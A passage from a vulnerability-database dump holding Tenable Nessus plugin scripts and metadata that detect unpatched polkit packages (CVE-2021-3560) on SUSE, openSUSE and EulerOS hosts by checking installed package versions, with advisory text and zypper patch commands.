script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", 
reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpolkit0-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"libpolkit0-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-debugsource-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-devel-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"polkit-devel-debuginfo-0.116-3.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"typelib-1_0-Polkit-1_0-0.116-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:07", "description": "This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : polkit (SUSE-SU-2021:1842-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libpolkit0", "p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo", "p-cpe:/a:novell:suse_linux:polkit", "p-cpe:/a:novell:suse_linux:polkit-debuginfo", "p-cpe:/a:novell:suse_linux:polkit-debugsource", "p-cpe:/a:novell:suse_linux:typelib-1_0-polkit", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-1842-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:1842-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150266);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SUSE SLES12 
Security Update : polkit (SUSE-SU-2021:1842-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\nCVE-2021-3560: Fixed a local privilege escalation using\npolkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20211842-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18b1c9ba\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-1842=1\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-1842=1\n\nSUSE OpenStack Cloud 9 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-9-2021-1842=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2021-1842=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP5 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-1842=1\n\nSUSE 
Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP4-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-1842=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-1842=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2021-1842=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-Polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\nif 
(rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpolkit0-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpolkit0-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-debuginfo-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"polkit-debugsource-0.113-5.21.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"typelib-1_0-Polkit-1_0-0.113-5.21.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:31", "description": "This update for polkit fixes the following issues :\n\n - CVE-2021-3560: Fixed a local privilege escalation using polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2021-06-07T00:00:00", "type": "nessus", "title": "openSUSE Security Update : polkit (openSUSE-2021-838)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpolkit0", "p-cpe:/a:novell:opensuse:libpolkit0-32bit", "p-cpe:/a:novell:opensuse:libpolkit0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libpolkit0-debuginfo", "p-cpe:/a:novell:opensuse:polkit", "p-cpe:/a:novell:opensuse:polkit-debuginfo", "p-cpe:/a:novell:opensuse:polkit-debugsource", "p-cpe:/a:novell:opensuse:polkit-devel", "p-cpe:/a:novell:opensuse:polkit-devel-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-polkit-1_0", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-838.NASL", "href": 
"https://www.tenable.com/plugins/nessus/150319", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-838.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150319);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE Security Update : polkit (openSUSE-2021-838)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for polkit fixes the following issues :\n\n - CVE-2021-3560: Fixed a local privilege escalation using\n polkit_system_bus_name_get_creds_sync() (bsc#1186497).\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1186497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-Polkit-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libpolkit0-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libpolkit0-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-debugsource-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-devel-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"polkit-devel-debuginfo-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"typelib-1_0-Polkit-1_0-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libpolkit0-32bit-0.116-lp152.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libpolkit0-32bit-debuginfo-0.116-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpolkit0 / libpolkit0-debuginfo / polkit / polkit-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:21:26", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-02-13T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : polkit (EulerOS-SA-2022-1090)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-devel", "p-cpe:/a:huawei:euleros:polkit-docs", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2022-1090.NASL", "href": "https://www.tenable.com/plugins/nessus/158017", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158017);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : polkit (EulerOS-SA-2022-1090)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. 
